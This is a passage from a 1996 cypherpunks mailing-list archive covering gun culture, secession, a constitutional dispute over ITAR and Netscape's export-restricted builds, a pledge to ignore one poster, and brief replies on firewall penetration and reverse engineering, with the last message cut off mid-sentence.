To: Ernest Hua <hua@xenon.chromatic.com>
Subject: [Noise] was Re: Giving 6 year old kids Uzi's
In-Reply-To: <199607192139.OAA23712@server1.chromatic.com>
Message-ID: <Pine.SOL.3.91.960720082619.6516C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 19 Jul 1996, Ernest Hua wrote:

> 
> > > the price of freedom of mind is a minor restriction on your personal
> > > freedom, you won't be allowed a weapon either but that is the tradeoff. 
> > 
> > Thanks, but if it is all the same to you, I'd rather live
> > in a country where everybody  << including six year olds >>
> > carry, and can use Uzi's, etc, as a matter of course.
> 
> Oh my ... you aren't serious, are you?
> 
> I suspect you might be baiting ... but ...
> 
> If you can trust a six-year-old with an Uzi, I assume that you believe
> the six-year-old can "properly" judge what is a threat and what isn't?
> Just why do you suppose a pissed-off six-year-old (because, let's say,
> another six-year-old stole his lunch) would not blast someone?
> 
> Would you just hand out guns to all teenagers?

My twelve-year-old daughter asked for and received a .22 for her birthday.
Her four and six year old siblings enjoy shooting it, under close 
supervision.

Rural America has a very different culture than urban America and urban 
America's recent attempts to impose its values (like hoplophobia) on us 
really chafes.

bd





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sun, 21 Jul 1996 00:29:56 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Gorelick testifies before Senate, unveils new executive order
In-Reply-To: <Pine.SV4.3.91.960719222009.17923D-100000@larry.infi.net>
Message-ID: <199607201241.IAA21802@nrk.com>
MIME-Version: 1.0
Content-Type: text


> 
> What does this Sternlight guy do for a living?

Jeeze Alan.....
NOW you've done it!

I warned you........


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Seth Oestreicher <setho@westnet.com>
Date: Sun, 21 Jul 1996 00:55:16 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: American People the relation to the Police
Message-ID: <1.5.4.32.19960720125602.00927ca8@westnet.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>
>Well, to many of us, the wrong side won the War of the Rebellion (aka the
>Civil War, aka the War Between the States, etc.).  A bunch of southern
>states wanted to seceed, which my reading of the founding documents said
>was clearly an option if sentiment was strong enough in that direction.

Even President Lincoln agreed that it was the right of the South to seceed......

>
>Constitutional scholars of course debate this, and I've seen arguments that
>the documents eventually agreed to in 1789-90 in some ways undercut this
>"right" to seceed. I think this to be untrue, and that the signers of the
>Declaration and of the Constitution would be surprised to learn that they
>were signing a one-way, unreversible, no way out document, binding their
>communities to be part of the United States of America forever, even if
>their populace clearly wants out.
>

The Federalist Papers made it quite clear that the States were to remain
"independant".

The Federal government was *not* designed for it's own self preservation,
but to preserve the collective rights of the States.

We wound up with our form of government today out of pure ignorance of the
populace.  When was the last time a jury exercised it's right to *not*
convict on the basis of a wrongful law?  When was the last time someone
questioned the validity of our central bank, the Federal Reserve, even
though it so clearly violates the Consitution?  Why doesn't the NRA use the
historic representation of the Second Amendment instead of trying to have us
believe we are some sort of militia?  (In a literal translation of the
amendment into today's English, it would read: Since we don't trust the
military because it could be used against the American people, but we
realize that having a trained military is important for the successful
defence of the States, we will make sure that no one can take the guns of
the populace so they may defend themselves from the aformentioned military.)
Why does ANYONE believe that there is a seperation of church and state?  Why
is foreign aid allowed to continue when it is not allowed by the
Constitution?  (I could go on and on.....)  

Ignorance of our history and our real *inalienable* rights has given us the
Government which so many fear today. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 20 Jul 1996 23:50:06 +0800
To: cypherpunks@toad.com
Subject: Re: Gorelick testifies before Senate, unveils new executive order
In-Reply-To: <Pine.SV4.3.91.960719222009.17923D-100000@larry.infi.net>
Message-ID: <5m9cRD186w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Horowitz <alanh@infi.net> writes:

> What does this Sternlight guy do for a living?

*Dr.* SternFUD is on SSI because of a mental disability.

Plus his parents support him.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sun, 21 Jul 1996 02:15:09 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Netscape download requirements
In-Reply-To: <v03007600ae161ad816f6@[192.187.162.15]>
Message-ID: <v0300760cae16b0bacf48@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:13 AM -0700 7/20/96, Sandy Sandfort wrote:

>
>Read the 9th, David.  Our rights exist whether or not the current
>regime recognizes them.  The reason Congress gets away with so
>many violation is in part due to the current population being
>willing to exchange a false sense of security for out and out
>violations of the clear words of the Bill of Rights.  That may
>be democracy, but at the expense of Constitutionally guaranteed
>freedoms.  Read the 9th and 10th, David.

"9th Amendment

The enumeration in the Constitution of certain rights shall not be construed to
deny or disparage others retained by the people."

Nothing in here about ITAR.

"10th Amendment

The powers not delegated to the United States shall not be construed to extend
           ^^^
to any suit in law or equity, commenced or prosecuted against one of the United
States by citizens of another State or by citizens or subjects of any foreign
state."

Nothing in here about ITAR.

On the other hand:

"We the People of the United States, in order to form a more perfect union,
establish justice, insure domestic tranquility, provide for the common
defence,"

...

"The Congress shall have power

...

To regulate commerce with foreign nations, and among the several states,
and with the Indian tribes;

...

To make all laws which shall be necessary and proper for carrying into
execution
the foregoing powers, and all other powers vested by the Constitution in the
government of the United States, or in any department or officer thereof."

Looks like ITAR is covered there.

So don't (as the Russians say) try to teach your Grandmother how to suck eggs.

David








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 21 Jul 1996 11:42:30 +0800
To: cypherpunks@toad.com
Subject: Re: Filtering out Queers is OK
In-Reply-To: <199607192315.QAA24402@server1.chromatic.com>
Message-ID: <wT9cRD187w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ernest Hua <hua@xenon.chromatic.com> writes:
> The same can be said of the children of the more politically
> correct.  My opinion is that religion is a waste of time and
> resources, and therefore, those who force their children to
> be religious is doing precisely the same harm you allude to.
>
> That is strictly MY opinion.  If there are enough of me
> around, should we be allowed to force the government to take
> children away from their religious parents?  More mildly, can
> the government "protect" a child from religious ideas?

In Russia, under Khrushchev, teaching children religion was viewed
as a serious form of child abuse, and its victims would often be
taken away and placed in orphanages.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sun, 21 Jul 1996 02:21:09 +0800
To: Brad Dolan <hua@xenon.chromatic.com>
Subject: Re: [Noise] was Re: Giving 6 year old kids Uzi's
In-Reply-To: <199607192139.OAA23712@server1.chromatic.com>
Message-ID: <v0300760dae16b3606e8b@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:31 AM -0700 7/20/96, Brad Dolan wrote:

>My twelve-year-old daughter asked for and received a .22 for her birthday.
>Her four and six year old siblings enjoy shooting it, under close
>supervision.
>
>Rural America has a very different culture than urban America and urban
>America's recent attempts to impose its values (like hoplophobia) on us
>really chafes.

Though it is well known that I am in favor of gun control regulations, I
have to support Brad Dolan here. There is a huge and traditional gun
culture in rural American, particularly in the midwest. The way most Jewish
kids get Bar Mitzvahed at 13 as a rite of passage into adulthood, or the
way most kids get their learner's permit to drive as such a symbol is the
way many midwestern kids get their first gun.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sun, 21 Jul 1996 01:04:28 +0800
To: alanh@infi.net (Alan Horowitz)
Subject: Re: take the pledge
In-Reply-To: <Pine.SV4.3.91.960719222636.17923E-100000@larry.infi.net>
Message-ID: <199607201308.JAA21951@nrk.com>
MIME-Version: 1.0
Content-Type: text


> 
> > Look, folks, we all know that 99% of what David Sternlight posts is
> > garbage. Why don't we all pledge not to answer any of his posts, and
> > then he'll go away.
> 
>    Thanks Perry for a great idea. Add my name to the list.

Hell, even *I* will agree with Perry on this one.
If we ignore the FUD, he'll go away soon enough.

Sign me up. 
[For 'Punks, of course -- it's too much fun to bait him
in alt.fan.david-sternlight..]


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 21 Jul 1996 02:21:30 +0800
To: david@sternlight.com
Subject: Re: Filtering out Queers is OK
Message-ID: <01I7AH0OXYGW9EDBUO@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"david@sternlight.com"  "David Sternlight" 20-JUL-1996 09:08:49.96

>I speak as a father who has raised four children who turned out to be
>independent beings to successful adulthood and families of their own, not
>as a theoretician.

	Most of my knowledge on the subject comes from a friend of mine...
who's a grandfather (raised 5 children) and a trained child psychiatrist. Until
he left his most recent position (in Alabama), he was the head of their
child psychiatry training program.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 21 Jul 1996 02:42:50 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: Netscape download requirements
In-Reply-To: <v0300760cae16b0bacf48@[192.187.162.15]>
Message-ID: <Pine.SUN.3.91.960720090344.2186A-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 20 Jul 1996, David Sternlight wrote:

> "9th Amendment
> 
> The enumeration in the Constitution of certain rights shall not
> be construed to deny or disparage others retained by the people."
> 
> Nothing in here about ITAR.

No David, there isn't.  That's because ITAR represents neither an
enumerated nor unenumerated right of the people.  The application
of ITAR to speech, however, is a violation of the 1st Amendment
which is enumerated.

> "10th Amendment
> 
> The powers not delegated to the United States shall not be
> construed to extend to any suit in law or equity, commenced or
> prosecuted against one of the United States by citizens of
> another State or by citizens or subjects of any foreign
> state."

You "accidentally" misquoted the 10th.  It actually says:

	The powers not delegated to the United States by the 
	Constitution nor prohibited by it to the States, are 
	reserved to the States respectively, or to the people.
 
> Nothing in here about ITAR.

See my explanation of the 9th Amendment, supra.

> "We the People of the United States, in order to form a more perfect union,
> establish justice, insure domestic tranquility, provide for the common
> defence,"
> 
> ...
> 
> "The Congress shall have power
> 
> ...
> 
> To regulate commerce with foreign nations, and among the several states,
> and with the Indian tribes;
> 
> ...
> 
> To make all laws which shall be necessary and proper for carrying into
> execution
> the foregoing powers, and all other powers vested by the Constitution in the
> government of the United States, or in any department or officer thereof."
> 
> Looks like ITAR is covered there.

Wrong.  Everything quoted above was adopted prior to the adoption
of the Bill of Rights.  In other words, the 1st, 2nd,...9th and
10th AMENDMENTS came after and modify (or amend, get it?) the 
clauses you rely so much on.

Now I see you have "accidentally" forgotten to address my response
to your blatently unconstitutional assertion that I don't have
the right to say that the system is being abused.  Please defend
that assertion, or at least tell us how you think the 1st Amendment
is a nit.

> So don't (as the Russians say) try to teach your Grandmother
> how to suck eggs.

Believe me, David, I don't think I could teach you anything.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Sun, 21 Jul 1996 02:21:26 +0800
To: Jerome Tan <jti@sybase.com>
Subject: Re: Firewall Penetration
Message-ID: <9607201621.AA17135@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


It depends.

---------- Previous Message ----------
To: cypherpunks
cc: 
From: jti @ i-manila.com.ph (Jerome Tan) @ smtp
Date: 07/19/96 05:29:11 PM
Subject: Firewall Penetration

Is it possible to penetrate a firewall?








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 21 Jul 1996 01:57:25 +0800
To: paquin@netscape.com
Subject: Re: US versions of Netscape now available
Message-ID: <01I7AI5ZK7EI9EDBUO@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"paquin@netscape.com" 20-JUL-1996 09:00:37.83

>Alex de Joode wrote:

>> I would like to know what Netscape's position on the above mentioned
>> scenario is .. (Uploading "possibly" received 128 bit binaries to
>> official netscape mirrors outside the US, that is) (guess why ...)

>I guess I should look again, but I *thought* our licenses explicitly
>excepted use of "US-Only" software (defined in the license) from the
>standard exclusions.  I think the attys lifted some of the definitions
>straight from ITAR and may have quoted 22USC.  Maybe we screwed
>up and got the wrong license in the beta and missed the check.
>I don't know.  I'll look.  *sigh*

	BTW, is the license essentially copyright-based? If so, you're going
to have trouble using it in a country that you can't legally sell/give away
with limits the stuff to; it is assumed that you aren't losing anything. I
may be wrong, of course, but that's my understanding of how penalties, etcetera
are determined under copyright law.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sun, 21 Jul 1996 03:08:16 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Netscape download requirements
In-Reply-To: <v0300760cae16b0bacf48@[192.187.162.15]>
Message-ID: <v0300760fae16bb3f479c@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:22 AM -0700 7/20/96, Sandy Sandfort wrote:
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>On Sat, 20 Jul 1996, David Sternlight wrote:
>
>> "9th Amendment
>>
>> The enumeration in the Constitution of certain rights shall not
>> be construed to deny or disparage others retained by the people."
>>
>> Nothing in here about ITAR.
>
>No David, there isn't.  That's because ITAR represents neither an
>enumerated nor unenumerated right of the people.  The application
>of ITAR to speech, however, is a violation of the 1st Amendment
>which is enumerated.

So now you're switching your ground to the First Amendment? Why can't you
argue straight out?

>
>> "10th Amendment
>>
>> The powers not delegated to the United States shall not be
>> construed to extend to any suit in law or equity, commenced or
>> prosecuted against one of the United States by citizens of
>> another State or by citizens or subjects of any foreign
>> state."
>
>You "accidentally" misquoted the 10th.  It actually says:
>
>	The powers not delegated to the United States by the
>	Constitution nor prohibited by it to the States, are
>	reserved to the States respectively, or to the people.

Slip of the editor, not a conspiracy. THe point is that it says "not
delegated to the United States", and as I showed below, powers which cover
ITAR were so delegated.

>
>> Nothing in here about ITAR.
>
>See my explanation of the 9th Amendment, supra.
>
>> "We the People of the United States, in order to form a more perfect union,
>> establish justice, insure domestic tranquility, provide for the common
>> defence,"
>>
>> ...
>>
>> "The Congress shall have power
>>
>> ...
>>
>> To regulate commerce with foreign nations, and among the several states,
>> and with the Indian tribes;
>>
>> ...
>>
>> To make all laws which shall be necessary and proper for carrying into
>> execution
>> the foregoing powers, and all other powers vested by the Constitution in the
>> government of the United States, or in any department or officer thereof."
>>
>> Looks like ITAR is covered there.
>
>Wrong.  Everything quoted above was adopted prior to the adoption
>of the Bill of Rights.  In other words, the 1st, 2nd,...9th and
>10th AMENDMENTS came after and modify (or amend, get it?) the
>clauses you rely so much on.

This is an unsustainable position for which you have no legal basis. Your
implied claim is that an amendment implicitly repeals prior language. As
we've seen from other amendments, if prior language is to be repealed that
is done explicitly or by reference in the amendment. There are some Supreme
Court cases because there are conflicts between the implicit content of
some amendments (the famous "penumbra of the Constitution") and prior
language. And we've seen many cases where even strict constructionists held
in Dicta that prior powers weren't implicitly repealed by the First,
particularly in speech cases. The famous "Freedom of Speech does not extent
to the right to falsely shout "Fire!" in a crowded theatre" is one. "The
Constitution is not a suicide pact." is another.

But Con Law is a bit off topic for this group, eh? Let's agree to disagree.

>Believe me, David, I don't think I could teach you anything.

That's both false and defamatory unless you're commenting on your own
shortcomings as a teacher. Some here will tell you that they've taught me a
lot, and that when evidence or logic are clear, I do alter my views. In the
instant case neither appertains, at least not so far.

Best;
David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 21 Jul 1996 02:10:49 +0800
To: jti@i-manila.com.ph (Jerome Tan)
Subject: Re: Firewall Penetration
In-Reply-To: <01BB75F4.8F028E40@ip160.i-manila.com.ph>
Message-ID: <199607201452.JAA02178@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Jerome Tan wrote:
> 
> Is it possible to penetrate a firewall?
> 

Yes. Sometimes people create incredibly stupid configurations of firewalls.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Date: Sun, 21 Jul 1996 03:44:23 +0800
To: hallam@ai.mit.edu
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <199607200646.CAA15585@lists.gateway.com>
Message-ID: <v03007601ae16cf3358f3@[204.179.131.57]>
MIME-Version: 1.0
Content-Type: text/plain


 On 19 Jul 1996 19:51:39 Hallam-Baker wrote
>It is no coincidence that the Tree of Liberty needs to be watered with
>blood on occasion.

As a native Bostonian, I have to tell you that the original "Tree of
Liberty" was cut down many many years ago and in it's place now stands a
storefront, if you look up onto the second floor you will notice a frieze
of a tree. This is all that stands to commemerate the "Tree of Liberty".


oh btw that storefront is in the comabat zone of boston, and the last time
I checked that  store was called either the "Naked I"or the "Pussycat
lounge", can you guess what they sell?

It's been a while since I've been in that neighborhood, so I dont remeber
the street corner, ask bob hettinga if you want to know where.

Speaking of Bob Hettinga put it to words best, told me that standing on the
Concord bridge he could see the colors of the American flag eminating
outwards to the rest of the country. Yup this is where it all started..



Vinnie Moscaritolo
"Law - Samoan Style"
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 21 Jul 1996 00:35:01 +0800
To: cypherpunks@toad.com
Subject: pledge status
Message-ID: <199607201416.KAA07379@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm glad to report that a large number of people have now taken the
pledge not to reply to David Sternlight's posts.

Remember, replying to David almost never serves any useful purpose --
he is almost totally incapable of admitting he is wrong, and almost
everyone disagrees with him already. By replying to him, you simply
continue to encourage him to fill the mailing list with junk.

Don't feed the Sternlight. Take the pledge.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 21 Jul 1996 00:58:58 +0800
To: Llywarch Hen <ecgwulf@worldnet.att.net>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <2.2.16.19960720081320.2427098c@postoffice.worldnet.att.net>
Message-ID: <199607201438.KAA07420@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Llywarch Hen writes:
> You have not had the opportunity to look closely at the business end
> of a gun.  The hole looks enormous.

The opening in the barrel of just about every rifle or pistol I've
looked at seems to be about half an inch or less. Perhaps you have
been looking at the 18" guns on the battleship "New Jersey"?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 21 Jul 1996 04:12:10 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: Netscape download requirements
In-Reply-To: <v0300760fae16bb3f479c@[192.187.162.15]>
Message-ID: <Pine.SUN.3.91.960720103118.10063C-100000@crl13.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 20 Jul 1996, David Sternlight wrote:

> But Con Law is a bit off topic for this group, eh? Let's agree
> to disagree.

Sure, I'll let you wiggle out of a discussion in which you were 
previously all to willing to participate.  I don't think, though,
that you should get off the hook so easily for your amazing--and
unsupportable assault on free speech, to wit:

> nor do YOU get to tell them that they are poor benighted fools
> who should agree with YOUR views on civil liberties. To assert
> otherwise is fascism, authoritarianism, dictatorship, pick one.

I'd appreciate it if you would defend, retract or "explain" why
I don't get to tell ANYONE that they should agree with my views
of civil liberties.  This is the third time I've addressed your
curious statement.  Please explain yourself.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sun, 21 Jul 1996 03:52:45 +0800
To: cypherpunks@toad.com
Subject: Re: pledge status
In-Reply-To: <199607201416.KAA07379@jekyll.piermont.com>
Message-ID: <v03007611ae16c9abab05@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:16 AM -0700 7/20/96, Perry E. Metzger wrote:
>I'm glad to report that a large number of people have now taken the
                         ^^^^^^^^^^^^^^^^^^^^^^^^
>pledge not to reply to David Sternlight's posts.
>
>Remember, replying to David almost never serves any useful purpose --
                             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>he is almost totally incapable of admitting he is wrong, and almost
       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^      ^^^^^^
>everyone disagrees with him already. By replying to him, you simply
^^^^^^^^^
>continue to encourage him to fill the mailing list with junk.
>
>Don't feed the Sternlight. Take the pledge.
>
>Perry

Interesting view of the truth.

Keep up the good work, Metzger. A few more like this and you'll be a
spammer. Plonk!

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 21 Jul 1996 01:00:09 +0800
To: jsw@netscape.com
Subject: Re: Netscape download requirements
In-Reply-To: <31F0CC92.44D7@netscape.com>
Message-ID: <199607201449.KAA07438@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
> Remo Pini wrote:
> > Why can't anybody in US write a little program that compares the
> > two 4.5 meg install files and make a patcher? (It seems simple to
> > do, is very inconspicuous and of course does not violate the ITAR
> > - although it might violate some copyright stuff, but hey, whos
> > willing to enforce something like that, when it's anonymously
> > posted or mailed)
> 
>   Actually a lawyer once told me that such a patch might be considered
> a "defense repair", and thus be regulated by the ITAR.  I kid you not.
> Your bits would fall into the same bucket as missile parts.  The more
> I learn about ITAR and the way the government tries to link software
> to it, the more amazed I get.

As a practical matter, however, such a piece of software could
circulate widely overseas without the U.S. being able to do anything
about it.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Murray <sdavidm@iconz.co.nz>
Date: Sat, 20 Jul 1996 12:11:32 +0800
To: cypherpunks@toad.com
Subject: Re: Borders *are* transparent
Message-ID: <199607192310.LAA13923@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


At 11:24 AM 7/18/96 -0700, TCM wrote:

> ... Borders _are_ transparent. There are
>so _many_ degrees of freedom for getting stuff across borders. The hope
>that a bunch of *bits* can be stopped in ludicrous.
>
>_This_ is why I expect the Netscape beta to arrive overseas pretty soon.

Undoubtedly.

Interestingly (to me, anyway), I noticed on my last trip to Hong Kong
that the Netscape products for sale in the legitimate shops had "US/Canada
only - not for export" (or similar) printed on the packaging. 

(Also of note, the hot Pirate CD of that time "Internet Xpress", with
such goodies as Symantec Java Cafe,  Spry Internet Office Pro, Netscape
Fast Track Server v2.0, Commerce Builder v1.5, also featured ViaCrypt
PGP v2.71 for Windows. Nice to see encryption as a must have net tool...)

dm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sun, 21 Jul 1996 01:24:57 +0800
To: "Bill Olson (EDP)" <a-billol@microsoft.com>
Subject: Re: Reverse Engineer
In-Reply-To: <c=US%a=_%p=msft%l=RED-16-MSG-960719175739Z-29104@tide19.microsoft.com>
Message-ID: <199607201514.LAA10501@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


"Bill Olson (EDP)" writes:

: Reverse engineering is process of 'mimicking' the specifications of
: another product by copying the 'abstract interface' of it. Example: 
: 
: I write a desktop application that greatly increases employee
: productivity, and it sells like hotcakes. Another company decides that I
: am gaining too much market share with my product and decides to reverse
: engineer the product so that they can create a competing product. They
: hire an engineer who takes the program and analyzes the input and output
: with a detailed script of test patterns (heaven forbid he might even
: decompile the program and snoop). By doing so, he now has a complete
: product specification minus the implementation (i.e. how it works). He
: then takes the product specification and gives it to another engineer
: (actually it's done through 'clean' liaisons) who then creates a product
: that does the exact same thing as mine--but with a different
: implementation process. Because the product copies the specification and
: not the implementation, it does not infringe on copyrights or patents.

Good explanation.  But note that reverse engineering is not a way of
getting around patent violations.  It only works to protect oneself from
copyright violations, since a reverse-engineered product is not
(arguably) a copy of the original.  It is also useful when the actual
workings of the original, or the way the original is made, is a (trade)
secret.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sun, 21 Jul 1996 04:40:17 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape download requirements
In-Reply-To: <v0300760fae16bb3f479c@[192.187.162.15]>
Message-ID: <v03007612ae16d2f7d9d6@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:40 AM -0700 7/20/96, Sandy Sandfort wrote:
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

>
>On Sat, 20 Jul 1996, David Sternlight wrote:
>
>> But Con Law is a bit off topic for this group, eh? Let's agree
>> to disagree.
>
>Sure, I'll let you wiggle out of a discussion in which you were
>previously all to willing to participate.

No wiggling involved. I think I refuted you decisively but recognize that
we've reached the point of diminishing returns for this group and that a
discussion focussing mostly on the interpretation of Constitutional
mechanics would be by and large off topic here. I was attempting to be
considerate, not evasive. I'll take it as far as you like (within the
bounds of civility) via e-mail.

> I don't think, though,
>that you should get off the hook so easily for your amazing--and
>unsupportable assault on free speech, to wit:
>
>> nor do YOU get to tell them that they are poor benighted fools
>> who should agree with YOUR views on civil liberties. To assert
>> otherwise is fascism, authoritarianism, dictatorship, pick one.
>
>I'd appreciate it if you would defend, retract or "explain" why
>I don't get to tell ANYONE that they should agree with my views
>of civil liberties.  This is the third time I've addressed your
>curious statement.  Please explain yourself.

Glad to explain it. I used "tell" in the sense of compel, not in the sense
of expressing one's opinion. "Joe told us what to do" is different from
"Joe expressed his opinion of what we should do" in the sense I used it.

Thanks for asking;
David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sun, 21 Jul 1996 04:43:33 +0800
To: jti@i-manila.com.ph (Jerome Tan)
Subject: Re: Firewall Penetration
In-Reply-To: <01BB75F4.8F028E40@ip160.i-manila.com.ph>
Message-ID: <v03007613ae16d448292b@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:52 AM -0700 7/20/96, Igor Chudov @ home wrote:
>Jerome Tan wrote:
>>
>> Is it possible to penetrate a firewall?
>>
>
>Yes. Sometimes people create incredibly stupid configurations of firewalls.

A more interesting answer (in which I'm also interested) would address the
possibility of penetrating a well-executed, well-managed firewall.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sun, 21 Jul 1996 04:45:15 +0800
To: "Peter D. Junger" <a-billol@microsoft.com>
Subject: Re: Reverse Engineer
In-Reply-To: <c=US%a=_%p=msft%l=RED-16-MSG-960719175739Z-29104@tide19.microsoft.com>
Message-ID: <v03007614ae16d4a73f54@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:14 AM -0700 7/20/96, Peter D. Junger wrote:
>"Bill Olson (EDP)" writes:
>
>: Reverse engineering is process of 'mimicking' the specifications of
>: another product by copying the 'abstract interface' of it. Example:
>:
>: I write a desktop application that greatly increases employee
>: productivity, and it sells like hotcakes. Another company decides that I
>: am gaining too much market share with my product and decides to reverse
>: engineer the product so that they can create a competing product. They
>: hire an engineer who takes the program and analyzes the input and output
>: with a detailed script of test patterns (heaven forbid he might even
>: decompile the program and snoop). By doing so, he now has a complete
>: product specification minus the implementation (i.e. how it works). He
>: then takes the product specification and gives it to another engineer
>: (actually it's done through 'clean' liaisons) who then creates a product
>: that does the exact same thing as mine--but with a different
>: implementation process. Because the product copies the specification and
>: not the implementation, it does not infringe on copyrights or patents.
>
>Good explanation.  But note that reverse engineering is not a way of
>getting around patent violations.  It only works to protect oneself from
>copyright violations, since a reverse-engineered product is not
